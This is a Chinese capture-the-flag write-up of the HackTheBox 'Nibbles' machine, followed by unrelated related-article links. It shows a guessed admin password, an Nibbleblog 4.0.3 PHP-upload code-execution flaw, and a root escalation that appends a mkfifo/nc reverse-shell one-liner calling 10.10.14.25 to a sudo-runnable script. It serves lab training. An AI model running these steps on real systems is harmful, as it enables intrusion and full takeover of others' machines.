HackTheBox-Machines--Nibbles

news/2025/2/14 2:19:37/
Nibbles 测试过程

1 信息收集

NMAP

在这里插入图片描述

80 端口

在这里插入图片描述

  网站出了打印出“Hello world!”外,无其他可利用信息,但是查看网页源代码时,发现存在一个 /nibbleblog 文件夹

在这里插入图片描述

  检查了 http://10.129.140.63/nibbleblog/ ,发现了 /index.php、/feed.php,没有其他可利用的信息

在这里插入图片描述

目录扫描

在这里插入图片描述

1. /content 目录

在这里插入图片描述

在这里插入图片描述

2. /admin.php 目录

在这里插入图片描述

  用户名:admin,爆破密码:nibbles,登录后页面如下

在这里插入图片描述

3. /README 目录

  发现Nibbleblog CMS 的版本号为:4.0.3

在这里插入图片描述

2 Nibbleblog 漏洞利用

在这里插入图片描述

Nibbleblog 4.0.3 代码执行漏洞原理

  当通过 My image 插件上传图片文件时,NibbleBlog 4.0.3 会保留上传文件的原始扩展名。不会检查此扩展名或实际文件类型,因此可以上传 PHP 文件并获得代码执行。

手工验证

在这里插入图片描述

  上传文件路径为:http://10.129.140.63/nibbleblog/content/private/plugins/my_image/image.php,访问 image.php,并忽略报错。ncat 监听到一个shell。

在这里插入图片描述

在这里插入图片描述

PTY Shell

在这里插入图片描述
在这里插入图片描述

3 权限提升

SUDO 提权

sudo -l

在这里插入图片描述

  检查 :/home/nibbler/personal/stuff/monitor.sh 文件

nibbler@Nibbles:/home/nibbler$ ls -ll 
ls -ll 
total 8
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 May 30 01:40 user.txtnibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zipcreating: personal/creating: personal/stuff/inflating: personal/stuff/monitor.sh  nibbler@Nibbles:/home/nibbler$ cd personal/stuff
cd personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -ll
ls -ll
total 4
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
cat monitor.sh#####################################################################################################                                        Tecmint_monitor.sh                                        ## Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/      ## If any bug, report us in the link below                                                          ## Free to use/edit/distribute the code below by                                                    ## giving proper credit to Tecmint.com and Author                                                   ##                                                                                                  #####################################################################################################

  文件可写,可以将shell文件写入monitor.sh文件中

nibbler@Nibbles:/home/nibbler/personal/stuff$
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 4444 > /tmp/f" >> monitor.shnibbler@Nibbles:/home/nibbler/personal/stuff$ 
sudo /home/nibbler/personal/stuff/monitor.sh

在这里插入图片描述

在这里插入图片描述


http://www.ppmy.cn/news/1465694.html

相关文章

如何实现接口的幂等性

如何实现接口的幂等性

1.唯一id。每次操作,都根据操作和内容生成唯一的id,在执行之前先判断id是否存在,如果不存在 则执行后续操作,并且保存到数据库或者redis等。 2.服务端提供发送token的接口,业务调用接口前先获取token,然后调用业务接口…
阅读更多...
什么是容器

什么是容器

容器(Container)是一种虚拟化技术,用于将应用程序及其所有依赖项打包到一个独立、可移植的单元中,从而能够在任何环境中一致地运行。这种技术使得应用程序的部署更加轻量、高效和灵活。容器与传统的虚拟机(VM&#xff…
阅读更多...
算法(十一)贪婪算法

算法(十一)贪婪算法

文章目录 算法简介算法概念算法举例 经典问题 -背包问题 算法简介 算法概念 贪婪算法(Greedy)是一种在每一步都采取当前状态下最好的或者最优的选择,从而希望导致结果也是全局最好或者最优的算法。贪婪算法是当下局部的最优判断&#xff0c…
阅读更多...
Golang协程和通道

Golang协程和通道

文章目录 协程(goroutine)基本介绍GMP模型协程间共享变量 通道(channel)基本介绍channel的定义方式channel的读写channel的关闭channel的遍历方式只读/只写channelchannel最佳案例select语句 协程(goroutine&#xff0…
阅读更多...
windows 11 精简版下载

windows 11 精简版下载

Optimum 11 24H2 家庭版和专业版版本在性能、响应能力和资源使用方面相同,因此请下载并安装适合您笔记本电脑的正确版本或在您的 PC 上获得终极 Windows 11 24H2 体验的许可证! • 如果您熟悉我们的 22H2 和 23H2 Optimum 11 版本,此版本将…
阅读更多...
用户画像知识点补充——多数据源

用户画像知识点补充——多数据源

引入 针对用户画像项目来说(产品)必须要支持从多种数据源加载业务数据,构建用户标签。 在之前的标签模型开发中,主要是为了简化开发复杂度,业务数据统一存储到HBase表中。 数据源包含如下几个方面: 存储H…
阅读更多...
在今日头条上写文章:ChatGPT完整使用教程

在今日头条上写文章:ChatGPT完整使用教程

了解如何充分运用ChatGPT进行创作 简介 在今日头条上发布文章变得越来越方便。本文旨在详细解析如何运用ChatGPT来创作文章,并提供全方位的使用指南及常见问题的答疑。 第一步:基础准备 确保你已注册今日头条账号。 登录ChatGPT并与你的今日头条账号进…
阅读更多...
网络智能化的发展对仿真环境的需求

网络智能化的发展对仿真环境的需求

1. 网络智能化背景介绍 1.1 什么是网络智能化 网络智能化是指利用人工智能(AI)、机器学习(ML)、优化算法等技术来实现网络的信息化、自动化和智能化。相对5G、6G、算力网络等领域,网络智能化是针对网络全场景、全要素…
阅读更多...
最新文章

Copyright @ 2022~2023